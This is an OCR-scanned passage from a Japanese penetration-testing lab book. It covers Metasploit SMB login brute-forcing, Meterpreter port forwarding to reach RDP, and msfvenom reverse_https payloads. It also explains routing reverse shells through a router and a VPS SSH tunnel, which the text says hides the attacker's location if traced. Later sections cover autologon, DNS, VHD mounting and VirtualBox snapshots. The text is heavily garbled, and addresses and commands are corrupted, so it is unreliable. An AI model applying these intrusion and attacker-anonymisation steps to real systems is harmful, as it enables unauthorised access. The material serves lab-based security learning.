IP) が 使わ れ て いま す 。 こ れ は ファ イル 共有 サー ビス の 1 つ で す 。 そ こ で 、SMB 
ログ イン ("auxiliary/scanner/smb/smb_login") の モジ ュー ル を 使っ て 、 総 当たり 
攻撃 し て み ま す 。 





ここ で は ID が "jpusiron"  、 パ スワ ー ド が "test' で ある と 判明 し た も の と し ま 
す 。 





| 第 10 章 | ネッ トワ ー ク 環境 の 拡張 745 


⑥ ホー ト フ ォ ワ ー デ ィング の 設定 を する 

踏み 台 端 末 (Windows 7) に 、( ロ ー カ ル ) ボー ト フ ォ ワ ー デ ィング の 設定 を し 
ます 。Meterpreter プロ ンプ ト に は portfwd コマ ンド が 用 意 き さき れ て お り 、 ポ ボー ト 
フォ ワー ディ ング の 設定 を 適用 で きま す 。 


ms 千 aux1liary(scanner/smb/smb_l1ogin) > sessions -u 2 
(セッ ショ ン 番 号 2 の Meterpreter セ ッ シ ョ ン に 入る ) 
meterpreter > portfwd add -] 3389 -p 3389 -r 19.9.1.3 


-」 上 ロー カル ポー ト 番号 。 
-p・ リ モー ト ボ ポート 番号 。 
-rm・ リ モー ト 端 末 の アド レス 。 こ こ で は 、 タ ー ゲ ッ ト 上 端末 の rp アド レス を 指定 する 。 


これ に より 、Kali (localhost) の ボ ポート 3389 に アク モス する と 、10.0.13 の ボー 
ト 3389 に 転送 され ます 。 


7 Windows 10 に RDP 接続 し て ログ イン する 
Kali の Terminal で 次 の よう に 入力 し ます 。 


Foott 人 kal1:<# rdesktop 127.9.9.1:3389 


RDP ク ライ アン ト が 起動 する の で 、 ス テッ プ ⑤) で 判明 し た ID と パス ワー ド を 人 入 
力 し ます 。 ロ グイ ン に 成功 する と 、Windows 10 の デス クト ッ プ が 表示 され ます 。 


人 @ 現実 的 な 攻撃 シナ リオ の 環境 構築 

前 述 の 図 ( 図 1020) で 示し た よう に 、 典 型 的 な ネッ トワ ー ク 構成 は 、 ル ー タ ー 
が 前 面 に あり 、 フ ァ イ ア ウォ ー ル で DMZ と 内 部 ネッ トワ ー ク に 分 離さ れ ま す 。 こ 
れ を 仮想 環境 で 実現 する と 図 10022 の よう に な り ま す 。 
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10-22 仮想 環境 に よる 典型 的 な ネッ トワ ー ク 構成 の 実現 例 


この ネッ トワ リー ク 構 成 を 物理 的 に 構築 する に は 、 い くつ か の 課題 が あり ます 。 
複数 台 の 端末 が 必要 で あり 、 ハ ー ド ウェ ア を 購入 する 初期 コス ト が か か り ま す 。 
さら に 、 物 理 的 な 空間 が 必要 で 、 稼 働 す る た め の 電 気 代 も か か り ま す 。 

これ まで の 知識 を 応用 すれ ば 、VirtualBox だ け で 仮想 的 に この ネッ トワ ー ク 構 
成 を 実現 で きま す 。 ルータ ー や ファ イア ウォ ー ル に 関し て は 、 こ うし た シス テム 
向け の OS が ある の で それ を 利用 し ます 。 ま た 、GNS3 と いう Cisco ルータ ー の エ 
ミュ レー タ を 活用 する こと も 有効 で す (https://www.gns3.com/) 。GNS3 と 
VirtualBox の 仮想 マシ ン を 連動 きせ て 、 ネ ットワーク を 構築 で きま す 。 


消 1 の ギャ ッ プ を 埋め る 


攻撃 端末 の LAN は ルー ター を 介し て イン ター ネッ ト に 接続 し て いま す 。 イン 
ター ネッ ト 側 の 端末 が ター ゲッ ト で ある 場合 、 一 般 に ルー ター の 存在 を 意識 せ ず 
に 攻撃 で きま す 。 こ れ は アウ トバ ウン ド (内 部 か ら 外 部 へ の アク セス ) で ある た 
めで す 。 し か し 、 リ バー スシ ェ ル の 最初 の 通信 は 、 イ ン バ ウ ンド (外部 か ら 内 部 
へ の アク セス ) で ある た め 、 ル ー タ ー の 存在 を 考慮 し な けれ ば な り ま せん 。 
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@ イン ター ネッ ト 越 し の Meterpreter セッ ショ ン 

ルー ター が デフ ォ ル ト の 設定 の まま だ と 、 リ バー スシ ェ ル の 通信 は プロ ッ ク さ 
れ て し まい ます 。 そ こ で 、( リ バー スシ ェ ル 型 の ) ペイ ロー ド と ルー ター を 次 の よ 
うに 設定 し ます 。 


① リ バー スシ ェ ル の ベ ペイロード を 作成 する 
次 の オプ ショ ン に 注意 し て 、 リ バー スシ ェ ル の ペイ ロー ド を 作成 し ます 。 こ こ 


で は 、msfvenom コ マン ド で windows/meterpreter/reverse_https を 指定 し ま 


す C17)。 


* LPORT : 8080 (任意 。 他 の ポー ト 番 号 と 重複 し な いよ うに する ) 
*LHOST: ルーター の グロ ー バ ル 1IP ア ドレ ス (Kai の IP アド レス で は な い ) 
(18) 


(② ホー ト フ ォ ワ ー デ ィング の 設定 を する 
ルー ター で は 、 次 の よう な ボート フ ォ ワ リーディング の 設定 を し ます 。 


s WAN 側 ボ ポート (サー ビス ポー ト ) : 8080 

* LAN 側 ボー ト (内 部 ボー ト ) : 8080 

* LAN 側 の 転送 先 IP アド レス : Kali の IP アド レス 
es プロ トコ ル : すべ て 


3③ リ パー スシ ェ ル を 待ち 受け る 
Kali 側 で ハン ドラ ー の モジ ュー ル を 設定 し て 、 リ バー スシ ェ ル を 待ち 受け ます 。 
その 際 、LPORT と LHOST を 次 の よう に 設定 し ます 。 


* LPORT : 8080 
・LHOST : Kai の IP アド レス 


*17 : Veil で ペイ ロー ド を 生成 する 場合 に は 、"/meterpreter/rev_https" ("は 任意 ) を 使い ます 。 


*18 : 静 的 IP アド レス で な けれ ば 、 ダ イナ ミッ ク DNS サ ービス で 取得 し た ホス ト 名 を 指定 する 方 
が 確実 で す 。 
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後 は ペイ ロー ド の 実行 を 待つ だ け で す 。 
上 記 の 設定 に より 、 イ ンタ ーネット か ら リ バー スシ ェ ル の 接続 が 来る と 、 Kali に 
その 通信 が 届き 、Meterpreter セ モッ ショ ン が 確立 し ます ( 図 10-23)。 





10.23 リバ ー ス シェ ル の た め の 設 定 


実際 に 実験 する に は 、 タ ー ゲ ッ ト 端 末 を スマ ホ の テ ザ リ ング で イン ター ネッ ト 
に 接続 し て か ら 、 ペ イロ ー ド を 実行 すれ ば よい で し ょ う 。 た だ し 、 ス マ ホ が ハッ 
キン グ ・ ラ ボ の LAN に 直接 接続 し な いよ うに 設定 し て お きま す 。 


で VPS 経由 で の Meterpreter セッ ショ ン 

上 記 の 方 法 に より Meterpreter セ モッ ショ ン を 確立 で きま す が 、 懸 念 事項 が あり 
ます 。「 ル ー タ ー の グロ ー バ ル IP ア ドレ ス 」 =「 攻 撃 者 の 居所 」 と いう こと で す 。 
パケ ッ ト キ ャ プチ ャ で 、 リ バー スシ ェ ル の 接続 先 の ITP アド レス が ば れ て し まい ま 
す 。 

少し で も 匿名 性 を 上 げ る た め に 、VPS に 中 継 さ きせ る と いう テク ニッ ク が 有効 で 
す 。 攻撃 が 発覚 し て 追跡 され た と し て も 、VPS の IP アド レス まで し か ば れ ま せん 。 


①VPS を セッ ト ア ッ プ する 
VPS を セッ ト ア ッ プ し ます 。 こ こ で は 、VPS で Ubuntu を 起動 し て いる も の と し 
ます 。SSH で 接続 で きる と ころ まで 設定 し て お きま す 。 


② リ バー スシ ェ ル の ベイ ロー ド を 作成 する 
リバ ー ス シェ ル の ペイ ロー ド を 作成 し ます 。 そ の 際 、LPORT と LHOST を 次 の 
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よう に 設定 し ます 。 


s LPORT : 4444 
* LHOST : VPS の IP アド レス 


③)VPS に 接続 し て 設定 を 行う 
Kalii か ら VPS に SSH で 接続 し て ("19) 、 Meterpreter セ モッ ショ ン の た め の 設 定 を 
適用 し ます 。 





VPS 側 の SSH は GatewayPorts が デフ ォ ル ト で no に な っ て いま す (項目 が な い 
の で デフ ォ ル ト 値 の no が 適用 され る )。 これ で は 、 リ モー ト ポ ー ト フォ ワー ディ ン 
グ 時 の ポー ト が 常に ルー プ バ ッ ク ア ドレ ス に バイ ンド され て し まい ます 。 そ こ で 、 
設定 ファ イル の "/etc/ssh/sshd_config'” ファ イル に 「GatewayPorts yes」 と いう 
行 を 追加 し て 、 任 意 の アド レス に バイ ンド する よう に し ます 。 





"/etc/ssh/sshd config" フ ァイル (追加 ) 





設定 後 、SSH サ ー バ ー を 再起 動 し ます 。 





*19 : ここ で は root で ログ イン し て いま す が 、 環境 に よっ て は それ 以外 の ユー ザー で ログ イン し な 
けれ ば な ら な いか も し れ ま せん 。 そ の と き は 、sudo コ マン ド と 併用 し て くだ さい 。 
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(④ リ バー スポ ボート フォ ワー ディ ング を 実現 する 

ssh コ マン ド に -R オ プシ ョ ン を 指定 する と リバース ボー ト フ ォ ワ ー デ ィング で 
きま す 。 次 の 書式 で 実行 し た 場合 、ssh server の port に アク セス する と 、remote 
host の remote port に アク セス で きま す 。 remote host が LAN 側 、ssh server が 
WAN 側 の と き に よく 使わ れる テク ニッ ク で す 。 





わか りや すい よう に 、 あ えて 「 ペ イロ ー ド が アク セス する ポー ト 番 号 」 (4444) 
と 「 待 ち 受 け ボ ポー ト 番 号 」 (1234) を 別 の ポー ト 番 号 に し まし た 。 こ こ で は 
「4444:127.0.0.1:1234] な の で 、「remote host = localhost = Kali 端 末 ‥= SSH ク ライ ア 
ント (ssh コ マン ド の 実行 端末 )」 と いう 状況 で す 。 よ っ て 、VPS へ の 4444 番 へ の 
アク セス が Kali の 1234 番 へ フォ ワー ディ ング され ます 。 こ れ で Kali と VPS で は 
SSH ト ン ネ ル が つなが っ た 状 態 に な り ま す ( 図 10.24)。 この と き ル ー タ ー の 存在 は 
無視 で きま す 。 こ れ を 維持 する た め に 、Terminal は その まま に し ます 。 





ター ゲッ ト 端 末 


10-24 VPS 経由 で の Meterpreter セッション 
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5) リ バー スシ ェ ル を 待ち 受け る 
Kalii 側 で ハン ドラ ー の モジ ュー ル を 設定 し て 、 リ バー スシ ェ ル を 待ち 受け ます 。 
その 際 、LPORT と LHOST を 次 の よう に 設定 し ます 。 


* LPORT : 1234 
* LHOST : 127.0.0.1 (Kalii の IP アド レス で は な い ) 


和俊 は ペイ ロー ド の 実行 を 待つ だ け で す 。 
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ハッ キン ク ・ ラ ボ に 
役立つ テク ニッ ク 


これ まで ハッ キン グ ・ ラ ボ を 構築 する | つの 道筋 を 紹介 し て きま し た 。 後 


は 、 読 者 の 皆様 の 手 で ハッ キン グ ・ ラ ボ を 拡張 し て 、 よ り 使 いや すい 環境 に 発 
に ね と 各 全 人 違っ 4 下 





本 章 で は これ まで の 草 に 稿 め ら れ な か っ た 内 容 に つい て 紹介 し ます 。 ハッ キ 
ング ・ ラ ボ の 発展 や 活用 に 役立つ は ず で す 。 





11-1 | 仮想 マシ ン の 保存 中 に ネッ トワ ー ク を 変更 する 





/ で ハ 


VirtualBox で は 仮想 マシ ン を 保存 状態 で 終了 し て いて も 、 仮 想 マ シン の ネッ ト 
ワー ク 設 定 の 一 部 を 変更 で きま す 。 し か し 、 ゲ スト OS に ネッ トワ リー ク の 変更 を 反 
遇 さ せる た だ ため に 、 若 十 の 手順 を 中 まな けれ ば な り ま せん 
1) ネ ットワーク に 接続 し 直す 

仮想 マシ ン の 画面 の 右 下 の ネッ トワ ー ク アイ コン に て 、「 ネ ットワーク アダ プ 


ター を 接続 |」 を 切っ て か ら 接 続 し 直し ます 。 


2) ネ ットワーク の 変更 を 認識 させ る 
OS に ネッ トワ ー ク の 変更 を 認識 させ ます 。 


Kali の 場合 


Terminal で 次 の コマ ンド を 入力 し 

草 serV1ce network-manager rest て ar て 
ある い は 

# ュ †down eth9 && 1fup eth9 


Metasploitable の 場合 


Terminal で 次 の コマ ンド を 実行 し ます 。 
$ sudo ifdown eth9 && sudo ifTup eth9 


Windows の 場合 


コタ ンド プロ ンプ トト で 次 の コロ マシ ンド を 系 力 し ます 


>netsh winsock rese 
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1 け 。 CO ソノ ) =| リド レレ ョ ン 





] 台 の PC を 複数 の ユー ザー で 共用 し て いる 場合 は 、 個 別 の エ ユー ザー ご と に アカ 

: す べき で す 。 こ れ に より 、 他 の ユー ザー が 自分 の デー タ に アク セス 

る こと が 難 し く な り ま す 。 ま た 、 そ れ ぞ れ の ユー ザー は 自分 の 好み の デス ク 
トッ プ の 壁紙 や テー マ に する と いっ た カス タマ イズ も 可能 と な り ま す 。 

1 台 の PC を 自分 だ けが 使用 する 場合 で も 、 基 本 的 に ログ オン 時 に パス ワー ド の 

入力 が 必要 に な り ま す 。 こ れ は セキ ュ リ ティ の 面 か ら も よい こと と いえ ます 。 

ー ト PC で あれ ば 盗難 時 に 簡単 に ログ オン され て し まう こと を 防げ ます 。 し か 


し 、 そ うい っ た 心配 が な い の で あれ ば 、 目 動 的 に ログ オン する 方 が 使い 勝手 が よ 
く な り ま す 。 自室 だ け で 使用 する PC で あれ ば 、 特 に そう で す 。 
ここ で は 、Windows 7 / 8 / 10 の 起動 時 の 自動 ログ オン 機能 を 有効 に する 方 法 


ユー ザー アカ ウン トコ ント ロー ル を 用 いる 方 法 

Windows 10 で あれ ば 、 ス ター トメ ニュ ー の 隣 の 入力 欄 に "netplwiz を 入力 し 
て 、 ユ ー ザ ー ア カウ ント コン トロ ー ル を 起動 し ます 。 

目 動 ロ グ オ ン さ せ だ た い ユ ー ザ ー 名 を 選択 し て 、 上 部 の | ユー ザー が この コン 
ESke ユー ザー 名 と パス ワー ド の 入力 が 必要 ] の チェ ッ ク を 外 
し ます ( 図 11-1)。 適 用 させ よう と する と 、 パ スワ ー ド の 人 入力 を うな が され ます 。 
パス ワー ド を 入力 し て 再起 動 す る と 、 自 動 ロ グ オ ン が 有効 に な り ま す で 1). 


1 : 間 違っ た パス ワー ド を 指定 し て も パス ワード 入力 ダイ アロ グ を 閉じ られ ます 。 し か し 、 PC 起 
動 時 の 自動 ログ オン に 失敗 し て 、 そ の タイ ミン グ で パス ワー ド の 入力 を うな が され ます 
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ユー ザー アガ カウ ッ ト 
ユー ザー 矢 細 設 補 


下 の 一 覧 を 使っ て 、 ほか が の ユー ザー の この コソ ヒュ ー ツ ー ヘ の アク セス を 主 可 また は 
失 宮 する こと が で きま す . また 、 人 ルス リー ド や その 他 の 全 定 を 客 宮 で きま す 。 


| 」 ユーザ ー が この コン ビ ピュー ター を 使う に は 、 ユー ザー 名 と パス ワー ド の 入 力作 志 (5) 


この コソ ビ ュー ター の ユー ザー( り |: 
ユー ザー 名 


ipusirof の り 洗 ス リー ド 


パス ワリ ー ド を 二 史 する に は . Cl+ At+ De キー を 提 し て [ 小 ス ワー ド の 二 下 ] 
を グリ ッ ク し て くだ さい 。 








図 11-1 自動 ログ オン の 設定 項目 


光 Sysinternals を 用 いる 方 法 


Microsoft は 、Sysinternals の 1 つと し て 、 自動 ログ オン 用 プロ グラ ム の 
"Autologon.exe' を 用 意 し て いま す 。 


Autologon - Windows SYsinternals | Microsoft Docs 


https://docs.microsoft.com/ja-jP/sysinternals/downloads/autologon 





解凍 後 の 容 量 は 135K バイ ト と 小さ く 、 使 い 方 も 簡単 で す 。 Username と Domain 
は 自動 で 入力 され る の で 、Password 欄 だ け 入 力 し て 、[Enable] ボタ ン を 押す だ 
け で す ( 図 11-2) 。 
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Autologon - Sysintcmals 





11-2 "Autologon.exe" に よる 自動 ログ オォ オン の 有効 化 


泡 レジ スト リ で 設定 する 方 法 
ここ で 解説 する 方 法 は 、 こ れ ま で に 解説 し た 方 法 よ り も リス ク が あり ます 。 な 
ぜ な ら ば 、 パ スワ ー ド を 平文 の 状態 で レジ スト リ に 格納 する た めで す 。 


① レ ジス トリ エディ ター を 起動 する 
[Win] + [R] キー を 押し て 、| フ ァイル 名 を 指定 し て 実行 」 画面 を 表示 し ます 。 
Iregedit] を 入力 し て 、 管 理 者 権限 で レジ スト リエ ディ ター を 起動 し ます 。 


② レ ジス トリ を 設定 する 
レジ スト リエ ディ ター 上 に て 、HKEY_LOCAL_MACHINE\SOFTWARE\Mi 
crosoft\Windows NT\CurrentVersion\Winlogon を 表示 し ます 。 
Winlogon キー に 対し て 、 表 11-1 に 示す 値 と デー タ を 設定 し ます ( 図 11.3)。 た だ 
し 、 シ ステ ム に よっ て は 、AutoAdminLogon が すでに 存在 する か も し れ ま せん 。 


表 11-1 キー に 設定 する 値 


PPPRPPRRRE Pe ーー トー 


目 動 ログ オン し た 
PP を | 55 


DefaultPassword | 文字 列 値 (REG_SZ) 平文 な の で 危険 。 


自動 ログ オ ・ する ーー か し ドメイン 認証 で 

DefaultDomain 文字 列 値 (REG_SZ) ド メ イ ・ ・ 二 な けれ ば 不要 ( 空 文字 列 で も 
よい )。 

AoAdmntoeon 文字 列 値 (REG_SZ) 1 Po | | 
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較 し ジス トリ エディター 


由 


 。UserDctsults 
) | 」 WableUserNorKey 
」VWiclcssDocting 


Windows Scnpt Host 
Windows Sesrch 


Windows Securiy Health 
、 」、WindowsRanbrme 


WindowsSdfHonr 


図 11-.3 レジ スト リ の 設定 


3 再起 動 す る 
最後 に 、Windows を 再起 動 し ます 。 
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そ ぐ 





| 2 AREAGOLO2 0a 
AutoLogonSD 

葉 AutoRestatShell 
S Cache ya 


DetsutPassword 


e や | DefaultlEerName 
DssBlsBsckButt 
締 DisssieCAD 

記 ) DissblelockWor- 
志 EnaplefistLogo。 
続 EnsbicSIHostint 
補 FoceUnlc<kt cg 
詞 LsstLogOffEndT に 
PLsstUsedUzermna 
Lcg*INoticeCapt 
| LegsINoticeText 
時 PasswordErpery。 
PowerdownAfte 
< PreCreateKnown ニ 
PReportBooWOk 








FEG_S 
REG_SZ 
REG DWORD 
REG _SZ 
mw pe 


REG 間 
FEG 
REG_DWORD 
REG_DWORD 
REG_DWORD 
REG_DWORD 
REG WORD 
FEG_DWORD 
REG_OWORD 
REG S 
REG _S7 
REG_ 
REG_DWORD 
REG SZ 
REG 
REG 


> 


ぐ - 1-5-21-30956 14300-2796437539-4075259078- 1001 
OxOJ00O081 (1) 
n0 り ロロ 





Cx0000C0001 (1) 
OODOO01 (1) 
OOD000nn (0 
Cx000000 ロ 1 1 
CxODOOOm1 (1) 
OODOOOOD (0 
COx354581fd (910524985) 
PVsrOn 


Cx0O0CO0005 (5) 
0 


(ASa0A1A4-1750- 生 Fe- 8D18- 16731KSAF1S 
1 マ 


| 第 3 部 | ハッ キン グ ・ ラ ボ の 拡張 


TH-3 | 高速 な DNS サー バー に 変更 する 





DNS は 主 に ドメイン 名 と IP アド レス を 対応 付け て 管理 する 仕組 み で す 。 こ れ を 
サー ビス と し て 提供 する サー バー が DNS サー バー で す 。 イ ンタ ーネット 上 の Web 
サイ ト に アク セス する た びに 、 プ ラウ ザ は 内 部 で DNS サー バー と や り と り し て TP 
アド レス を 取得 し て 、 そ れ を 利用 し て 通信 し て いま す 。 つ まり 、DNS サーバー の 
応答 が 速 け すれ ば 、 イ ンタ ーネット へ の 接続 が 速い と いえ ます 。 

近年 で は DNS サー バー を 一 般 に 公開 し て いる 企業 が 多数 存在 し ます 。 イ ンタ ー 
ネッ ト へ の 接続 が 遅い と 感じ る よう で あれ ば 、 試 し て みる と よい で し ょ う ( 表 11- 
1 お 


表 11.2 DNS サー バー の IP アド レス 


DNS サー パー の IP アド レス 
Google Public DNS 8.8.8.8 8.8.4.4 


DNS Advantage 156.154.70.1 156.154.71.1 
Comodo Secure DNS 9.26.56.26 98.20.24/.20 





OpenDNS 208.6 / .222.222 208.6/.220.220 


| イン ター ネッ ト プ ロ トコ ル バ ー ジ ョ ン 4| の プロ パテ ィ を 開き 、| 次 の DNS 
サー バー の アド レス を 使う ] に て 、DNS サ ー バ ー の IP アド レス を 設定 し ます 。2 
つの IP アド レス が 提供 され て いる 場合 に は 、 そ れ ぞ れ を 優先 DNS サー バー と 代 礁 
DNS サー バー に 設定 し ます ( 図 114)。 
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イソ ター ネッ ト ブロ トコ ゴル バー ジョ ッ 4 (TCP/IPv4 の プロ ル テ ィ 
全 符 械 蒼 の 覆 成 


ネッ トワ リーク で この 此 征 が サポ リー ト さ れ て いる 場合 は 、IP 誌 定 も 正 動 的 に 取得 する こと が で 
は) り 才 - ト され て いち い 場 合 は 、 ネッ トワ ー ク 菅 理 者 に 井 り で IP 記 二 を 問い 合わ せ て 


し い 。 
⑯) IP アド ルス を 紀 動 5 に 取 呈 すさ (O) 
て ) 次 9 P ドル ス を 使う (S)- 
IP 了 ド ルス | 





サブ ゴ ュ ッ ャ トマ の |U) 


fi ルト ゲー トワ rf(D) 





() DNS サー ドー の アド し ス を 上 動 向 に 町 付 す 3(8⑧) 
⑲ 次 の DNS サー リ (- の アド レス を 使う (Bi 
優先 DNS サー バー(P: 





代 稔 DNS サー バー(A: 


[日 姓 子 陰 に 全 全 を 株 計 す めい 





図 11.4 プロ パテ ィ 画 面 に お ける DNS サー バー の 設定 


し か し 、 こ うし た 海外 の DNS サー バー が 逆 効果 に な る こと も あり ます 。 例え ば 、 
Red Hat CDN (コン テン ツ 配 信 ネ ットワーク ) は 、 ア クセ ス し て きた マシ ン に 対 
し て 、 ネ ットワーク 的 に 最も 近い サー バー を 参照 させ ます 。 そ の た め 、 国 内 か ら 
海外 の DNS サー バー を 参照 し て いる と 、Red Hat CDN の 海外 の キャ ッシュ サー 
バー を 参照 し て し まう こと に な り ま す 。 そ の 結果 、 ダ ウン ロー ド 速 度 が 低下 する 


こと が あり ます 。 そ の た め 、 こ うし た 特殊 な ケー ス で は 、 海 外 の DNS サー バー を 
使わ な い 方 が よい と いえ ます 。 
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4 | Vhd フ ァイル を ドラ イブ 化し て 読み 込む 





Windows で バ パック アップ し た デー タダ (シス テイ メー は 、VHD (仮想 ディ 

スク ) 形式 の ファ イル と し て 保存 きれ ます 。Windows の ディ スク の 管理 機能 に よ 
り 、vhH フ ァイル を ドラ イプ と し て 表 続 で きま す 。 つま り 。 パッ クア ッ プ し た デー 
グ を 和 神 元 する の で は な く 。 ドド ライ プ と し て マウ ント し ます 。 ぞ そ し て 。 そ ぞ その ドラ テイ 
ブ 内 の ファ イル を 、 現 在 の 環境 に コビー で きま す 。 


り | ディス ク の 管理 」 画面 を 表示 する 

コン トロ ー ル パネ ル を 表示 し 、「 シ ステ ム と セキ ュ リ ティ | > 「 ハ ー ド ディ スク 
パー ティ ショ ン の 作成 と フォ ー マ ッ ト | を 押し て 、「 デ ィ ス ク の 管理 画面 を 表示 
し ます 。 


2)VHD ファ イル に 接続 する 
メニ ュー の 「 提 作 ] > 「VHD の 接続 | を 選択 し ます ( 図 11-5)。 


Em ティ スク の 吉 下 
ファ イル (F) |」 揚 性 AD | 表 函 (VV ハル オガ (H) 
昌 六 切 居 幸 に 更 導 (F) 


1 中 0YW2 | アイ ル シス テム | 伏 入 。) | 登 号 ”) | 空き 向 | 空き 第 沼 の る |.| = | 


VHD の 許 宝 NIFS 正 営 ブー ト .。 231.55 GB 6831G8 29% 
VHD の 溢 続 N 正常 倒 .。 819AMB 8toMB 100 和 % 
NIFS 正常 | シス. 549MB Ss14MB 9 








ます バ て の タス ツウ (K 


ん ル 九 ) 


ーー ティス ク 0 ーー キャ テニ ーー ニキ テウ 0 へ WW べべ べべ jj『 ゝ WOWCW ぶ べべ vWKWKWKTXWKWKWvKWK 
バー ジッ ク ジス テム で 子 配 千 み C) ン ン アン ン 1 

e3c.68 G8 549 MB NTFS 231.55 G8 NTFS . | 8l9MB 

オプ ライ ン 束 (シス テム アク ティ ナブ, プラ イマ ! 草 正 半 (ブー ト ペー ジフ ァイル , クラ ッシュ ダン プ プラ イマ リ バー ティ ショ ン ] | | 王 生 (回避 江 - テ ィ シ ョ ン 


較 計り 当て 較 プラ イマ リ ルー ティ ショ ソ 





図 11-5 「VHD の 接続 ] を 選択 


仮想 ハー ド デ ィ スク の 接続 ] ダイ アロ グ が 表示 され る の で 、[ 参 照 ] ボタ ン を 
押し て 、vhd フ ァイル を 指定 し ます 。[OK] ボタ ン を 押す と 、「 デ ィ ス ク の 管理 」 
画面 に て その vhd フ ァイル が ドラ イプ ブ プ と し て 表示 され ます ( 図 11-6) 。 
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な お 、 


PP ティ スク の 管理 
ファ イル (F) 揚 作 IA) 委 示 (MM _ ハルカ H) 
和 を 中 | 株 | 騰 還 | 声 日 


齋 り ュー ム レイ アウ ト | 答 拉 | アイ ル シ ス テム | 人 な 律 。 | 中 呈 
( リン ブル バー ショ ケ 。 NTFS 正 藤 プー ト 。 231.55 GBP 
sm ( チ ィ スク 0 パー チ ィ シ . 、 ジン プル バー シッ ケ 正 入 (回 復 - 19iMB 
es [ディ スウ 1 リー ティ シ .。 シッ プル バー シッ ク 。 NTFS 正午 | げ う -- 231.ssGB 
sm シス テム で 子 約 授 み ジン プル バー シッ ク 。 NTFS 正 富 (シス 。 59 MB 


E は て 拓本 て 開 
65.95 GB 28 基 
お 19 MB 100 利 
57.3GCGB = っ 2 コ 先 
5S13 MB 4 


















ーー ティ スク 0 

バー ジッ クウ シス テム で 子 維 泊 み % 

232.88 GB 549 MB NTFS 231.55S GB NTfS 

オラ プラ イン 正 飼 (シス テム アク ティ ナ プラ ュ || 正念 (ブー ト . ペー ジ ファ イル クラ ッシュ ダッ プ ブラ イマ ! リ | 皇 - テ ィ 


231.55 GB NTFS 
正 営 プラ イマ リ 代 - テ イシ ョ ツ ) 








新しい スル ソ 放り ュー ム [NI.。 
較 = 引当 新しい スト ライ ナブ 率 り ュ ー ム IT)- 
交 し し ミエ テー 遍 リ ュー ルム) RI 。 











819 MS 
王 菅 [加害 パー ティ ショ ン ) 






132 MB 
9 当て 





閑 し い RAD- 5 茶 り ュー ム (W) 接続 し た yhd ファ イ 月 月 に 蛋 
ダイ ナミ ッ ク ディ スク に 変 代 (Oー ドラ イブ と し て 表示 され ます 。 








MBR ティ スワ に 二 提 (V) 


ハル H) 


図 11-6 接続 し た VHD 


合 に は 、 これ を 選択 し ます 。 





ドラ イブ 化し た vhd フ ァイル を 切断 する に は 、VHD ディス クア イコ ン を 


選択 し て 、 右 クリ ッ ク し て |VHD の 切断 」 を 選択 し ます 。 あ る い は 、 OS を 再起 動 
すれ ば 上 自動 的 に 切断 され ます 。 
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1-9 、 MIaVElI に の 4 ソル ャ ルン アル レ 4 メーン レル = ピン ンク 





仮想 マシ ン で あれ ば 、 中 途 半 端 に 設定 を 壊し て し まっ た り 、 設 定 を 間 四 え た り 
し て も 、 そ れ ほ ど 怖 く あ り ま せん 。 し か し な が ら 、OS の イン スト ー ル か ら や り 直 
す の は 少々 面倒 と いえ ます 。 そ こ で ある 程度 設定 を 適用 し た 時 点 で 、 仮 想 マ シン 
を バッ クア ッ プ する こと を お すす めし ます 。 


誠 VirtualBox の パ バック アップ 
VirtualBox に お ける 仮想 マシ ン を バッ クア ッ プ する に は 、 主 に 次 の 2 つの 方 注 
が 傘 げ られ ま  * 


e 仮想 アプ ライ アン ス 


Ss。 ス ナップ ショ ッ ト 


念 仮想 アプ ライ アン ス に よる バッ クア ッ プ 
仮想 アプ ライ アン ス は 、ova フ ァイル と し て 出力 する 方 法 で す 。 最初 Kali の 仮想 
マシ ン を 構築 し た 際 に 、ova フ ァイル を イン ボー ト し た こと を 思い 出し て くだ さる 
い 。 バック アッ プ 時 に は 、 仮 想 マ シン を ova フ ァイル に エク スポ ー ト する の で す 。 
この ova フ ァイル に は 仮想 マシ ン の すべ て の 状態 が 書き 込ま れる こと に な り ま 


す 。 つ まり 、ova フ ァイル さえ ぇ 保存 し て お け ば よい こと に な り ま す 。 外部 スト レー 
ジ に 保存 し て お け ば 、 よ ee のち 。 PR この ova フ ァイル を 使え 
ば 、 他 の マシ ン の VirtualBox で も 同じ 仮想 マシ ン を 復元 で きま す 。 


倫 ス ナッ プシ ョ ッ ト に よる バッ クア ッ プ 
仮想 マシ ン は 、 | 設定 ファ イル 」 と | 仮想 ディ スク の ファ イル 」 か ら で き て いま 
す 。 つ まり 、 こ の 「 人 仮想 デ ィ ス ク の ファ イル 」| が 現時 点 に お ける 仮想 マシ ン の 状 


スナ ッ プ ショ ッ ト は 、 写真 を 撮る か の よう に 、 仮 想 マ シン の 状態 を 記録 す 
組み で す 。VirtualBox は スナ ッ プ ショ ッ ト 機 能 を 備え を て お り 、 こ の 機能 を 使う こ 
と で 簡単 か つ 短 時 間 で バッ クア ッ プ で きま す 。 

スナ ッ プ ショ ッ ト は 、 差 分 ファ イル の 形 で 保存 され て いき ます 。 最初 の スナ ッ 
プシ ョ ッ ト は 、 元 の 仮想 マシ ン か ら 見 た 差分 と し て 記録 きれ ます 。 2 番目 の スナ ッ 
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プシ ョ ッ ト は 、 最 初 の スナ ッ プ ショ ッ ト か ら 見 た 差分 と し て 記録 され ます 。 差分 
ファ イル な の で 、 ス トレ ー ジ の 容量 を 節約 で きま す 。 し か し 、 ロ ー カ ル PC 
(VirtualBox が イン スト ー ル され た PC) が 故障 し て し まう と 、 ス ナッ プシ ョ ッ ト 
で 作成 し た バッ クア ッ プ だ け で な く 、 仮 想 マ シン さえ も 復元 する こと が 困難 に な 
り ま す 。 


光 スナ ッ プ ショ ッ ト を 作成 し て みよ う 

スナ ッ プ ショ ッ ト に は 、 仮 想 マ シン か ら 行 う 方 法 と VirtualBox か ら 行 う 方法 が 
あり ます 。 ス ナッ プシ ョ ッ ト に 関し て は 手順 だ け で な く 、 階 層 構 造 の 表示 の 変化 
も 重要 な の で 、 解 説 の 通り に 手 を 動か すこ と を お すす めし ます 。 最終 的 に は ス 
ナッ プシ ョ ッ ト が な い 状 態 に 戻す の で 、 安 心して くだ さい 。 


代 仮想 マシ ン か ら ス ナッ プシ ョ ッ ト を 作成 する 方 法 
仮想 マシ ン の メニ ュー か ら ス ナッ プシ ョ ッ ト を 作成 する に は 、 次 の よう に し ま 
す 。 


①「 仮 想 マ シン の スナ ッ プ ショ ッ ト 作 成 」 画面 を 表示 する 

仮想 マシ ン C2) を 実行 中 に 、 仮想 マシ ン の メニ ュー の | 仮想 マシ ン 」>「 ス ナッ 
プシ ョ ッ ト を 作成 」 を 選び ます 。 す る と 、 | 仮想 マシ ン の スナ ッ プ ショ ッ ト 作 成 」 
